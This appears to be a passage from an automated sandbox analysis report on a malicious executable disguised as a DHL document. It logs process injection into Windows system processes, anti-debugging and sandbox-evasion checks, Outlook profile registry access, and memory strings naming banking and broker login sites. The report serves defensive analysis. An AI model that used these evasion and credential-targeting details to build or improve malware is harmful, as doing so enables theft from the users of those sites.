            Source: C:\Windows\SysWOW64\netbtugc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
            Source: C:\Windows\SysWOW64\netbtugc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: DHL 30312052024.exe | Static file information: File size 1208832 > 1048576
            Source: DHL 30312052024.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: DHL 30312052024.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: DHL 30312052024.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: DHL 30312052024.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: DHL 30312052024.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: DHL 30312052024.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: DHL 30312052024.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FBboLdkGSWBoDSVHPM.exe, 00000003.00000002.3800818888.0000000000DDE000.00000002.00000001.01000000.00000004.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000006.00000000.1605480285.0000000000DDE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: DHL 30312052024.exe, 00000000.00000003.1383389464.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, DHL 30312052024.exe, 00000000.00000003.1382853691.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1442412301.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1444131377.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1535444356.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1535444356.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1538342917.0000000002C05000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3805598042.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1535492497.0000000002A5E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3805598042.0000000002F4E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: DHL 30312052024.exe, 00000000.00000003.1383389464.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, DHL 30312052024.exe, 00000000.00000003.1382853691.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1442412301.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1444131377.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1535444356.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1535444356.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000003.1538342917.0000000002C05000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3805598042.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1535492497.0000000002A5E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3805598042.0000000002F4E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.1504105797.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1535269260.0000000003400000.00000004.00000020.00020000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000003.00000002.3801564027.0000000001118000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.3800906061.00000000027FE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3807603495.00000000033DC000.00000004.10000000.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3805604147.00000000031EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1831574937.000000000D6FC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.3800906061.00000000027FE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3807603495.00000000033DC000.00000004.10000000.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3805604147.00000000031EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1831574937.000000000D6FC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.1504105797.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1535269260.0000000003400000.00000004.00000020.00020000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000003.00000002.3801564027.0000000001118000.00000004.00000020.00020000.00000000.sdmp
            Source: DHL 30312052024.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: DHL 30312052024.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: DHL 30312052024.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: DHL 30312052024.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: DHL 30312052024.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C04B37 LoadLibraryA,GetProcAddress
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C20739 push es; retn 5600h | 0_2_00C20753
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C28945 push ecx; ret | 0_2_00C28958
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_013E9331 push ebx; retf | 0_2_013E933D
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_013E9B31 push ebx; retf 0000h | 0_2_013E9B3D
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_013E9AF1 push ebp; retf 0000h | 0_2_013E9B6D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004048A9 push esp; ret | 2_2_004048AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041E2BA push 00000038h; iretd | 2_2_0041E2BE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A436 push ebx; iretd | 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418C92 pushad ; retf | 2_2_00418C93
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A5D9 push ebx; iretd | 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004017E5 push ebp; retf 003Fh | 2_2_004017E6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403780 push eax; ret | 2_2_00403782
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004147A2 push es; iretd | 2_2_004147AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A0225F pushad ; ret | 2_2_03A027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A027FA pushad ; ret | 2_2_03A027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A309AD push ecx; mov dword ptr [esp], ecx | 2_2_03A309B6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A0283D push eax; iretd | 2_2_03A02858
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A01366 push eax; iretd | 2_2_03A01369
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DB225F pushad ; ret | 4_2_02DB27F9
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DB27FA pushad ; ret | 4_2_02DB27F9
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DB283D push eax; iretd | 4_2_02DB2858
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DE09AD push ecx; mov dword ptr [esp], ecx | 4_2_02DE09B6
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02DB1368 push eax; iretd | 4_2_02DB1369
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_00612238 pushad ; iretd | 4_2_00612239
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_0061AB37 push 00000038h; iretd | 4_2_0061AB3B
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_00616CB3 push ebx; iretd | 4_2_00616E7D
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_00616E56 push ebx; iretd | 4_2_00616E7D
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_00610EAB push ebp; retf | 4_2_00610EAC
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_0061101F push es; iretd | 4_2_00611027
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_00601126 push esp; ret | 4_2_00601127
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_0061D1B0 push es; ret | 4_2_0061D1D0
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C85376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C23187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\DHL 30312052024.exeAPI/Special instruction interceptor: Address: 13ED064
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF90818D324
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF90818D7E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF90818D944
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF90818D504
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF90818D544
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF90818D1E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF908190154
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF90818DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7096E rdtsc 2_2_03A7096E
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 405Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 9567Jump to behavior
            Source: C:\Users\user\Desktop\DHL 30312052024.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-105780
            Source: C:\Users\user\Desktop\DHL 30312052024.exeAPI coverage: 4.9 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7708Thread sleep count: 405 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7708Thread sleep time: -810000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7708Thread sleep count: 9567 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7708Thread sleep time: -19134000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe TID: 7724Thread sleep time: -70000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe TID: 7724Thread sleep count: 36 > 30Jump to behavior
            Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe TID: 7724Thread sleep time: -36000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C6445A GetFileAttributesW,FindFirstFileW,FindClose | 0_2_00C6445A
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C6C6D1 FindFirstFileW,FindClose | 0_2_00C6C6D1
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C6C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf | 0_2_00C6C75C
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C6EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00C6EF95
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C6F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00C6F0F2
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C6F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose | 0_2_00C6F3F3
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_00C637EF
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C63B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_00C63B12
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C6BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose | 0_2_00C6BCBC
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_0061BAB0 FindFirstFileW,FindNextFileW,FindClose | 4_2_0061BAB0
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo | 0_2_00C049A0
            Source: F56GKLK7U4.4.dr | Binary or memory string: dev.azure.comVMware20,11696497155j
            Source: F56GKLK7U4.4.dr | Binary or memory string: global block list test formVMware20,11696497155
            Source: F56GKLK7U4.4.dr | Binary or memory string: turbotax.intuit.comVMware20,11696497155t
            Source: F56GKLK7U4.4.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
            Source: netbtugc.exe, 00000004.00000002.3812381994.00000000075A9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: rokers - EU WestVMware20,11696497155n
            Source: F56GKLK7U4.4.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
            Source: netbtugc.exe, 00000004.00000002.3812381994.00000000075A9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: tVMware20,11696497155
            Source: F56GKLK7U4.4.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
            Source: F56GKLK7U4.4.dr | Binary or memory string: tasks.office.comVMware20,11696497155o
            Source: F56GKLK7U4.4.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
            Source: firefox.exe, 00000008.00000002.1833335768.000001EB4D75C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: F56GKLK7U4.4.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
            Source: F56GKLK7U4.4.dr | Binary or memory string: bankofamerica.comVMware20,11696497155x
            Source: F56GKLK7U4.4.dr | Binary or memory string: ms.portal.azure.comVMware20,11696497155
            Source: F56GKLK7U4.4.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
            Source: F56GKLK7U4.4.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
            Source: F56GKLK7U4.4.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
            Source: F56GKLK7U4.4.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
            Source: F56GKLK7U4.4.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
            Source: F56GKLK7U4.4.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
            Source: netbtugc.exe, 00000004.00000002.3800906061.00000000027FE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz
            Source: netbtugc.exe, 00000004.00000002.3812381994.00000000075A9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11
            Source: netbtugc.exe, 00000004.00000002.3812381994.00000000075A9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155
            Source: netbtugc.exe, 00000004.00000002.3812381994.00000000075A9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: hange Transaction PasswordVMware20,11696497155
            Source: F56GKLK7U4.4.dr | Binary or memory string: interactivebrokers.comVMware20,11696497155
            Source: netbtugc.exe, 00000004.00000002.3812381994.00000000075A9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: nge Transaction PasswordVMware20,11696497155^
            Source: F56GKLK7U4.4.dr | Binary or memory string: AMC password management pageVMware20,11696497155
            Source: F56GKLK7U4.4.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
            Source: F56GKLK7U4.4.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
            Source: F56GKLK7U4.4.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
            Source: F56GKLK7U4.4.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
            Source: F56GKLK7U4.4.dr | Binary or memory string: discord.comVMware20,11696497155f
            Source: netbtugc.exe, 00000004.00000002.3812381994.00000000075A9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: rs.comVMware20,11696497155
            Source: netbtugc.exe, 00000004.00000002.3812381994.00000000075A9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .comVMware20,11696497155
            Source: netbtugc.exe, 00000004.00000002.3812381994.00000000075A9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,1169649
            Source: F56GKLK7U4.4.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
            Source: FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3801646921.000000000128F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
            Source: netbtugc.exe, 00000004.00000002.3812381994.00000000075A9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,116964971
            Source: F56GKLK7U4.4.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
            Source: F56GKLK7U4.4.dr | Binary or memory string: outlook.office365.comVMware20,11696497155t
            Source: F56GKLK7U4.4.dr | Binary or memory string: outlook.office.comVMware20,11696497155s
            Source: F56GKLK7U4.4.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
            Source: F56GKLK7U4.4.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
            Source: F56GKLK7U4.4.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
            Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A7096E rdtsc | 2_2_03A7096E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417823 LdrLoadDll | 2_2_00417823
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C73F09 BlockInput | 0_2_00C73F09
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C03B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW | 0_2_00C03B3A
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C35A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer | 0_2_00C35A7C
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C04B37 LoadLibraryA,GetProcAddress | 0_2_00C04B37
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_013ED330 mov eax, dword ptr fs:[00000030h] | 0_2_013ED330
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_013ED2D0 mov eax, dword ptr fs:[00000030h] | 0_2_013ED2D0
            Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_013EBCB0 mov eax, dword ptr fs:[00000030h] | 0_2_013EBCB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h] | 2_2_03A2E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h] | 2_2_03A2E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h] | 2_2_03A2E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A5438F mov eax, dword ptr fs:[00000030h] | 2_2_03A5438F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A5438F mov eax, dword ptr fs:[00000030h] | 2_2_03A5438F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h] | 2_2_03A28397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h] | 2_2_03A28397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h] | 2_2_03A28397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h] | 2_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h] | 2_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h] | 2_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h] | 2_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h] | 2_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h] | 2_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h] | 2_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h] | 2_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h] | 2_2_03A4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h] | 2_2_03A4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h] | 2_2_03A4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A663FF mov eax, dword ptr fs:[00000030h] | 2_2_03A663FF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AEC3CD mov eax, dword ptr fs:[00000030h] | 2_2_03AEC3CD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h] | 2_2_03A383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h] | 2_2_03A383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h] | 2_2_03A383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h] | 2_2_03A383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB63C0 mov eax, dword ptr fs:[00000030h] | 2_2_03AB63C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADE3DB mov eax, dword ptr fs:[00000030h] | 2_2_03ADE3DB
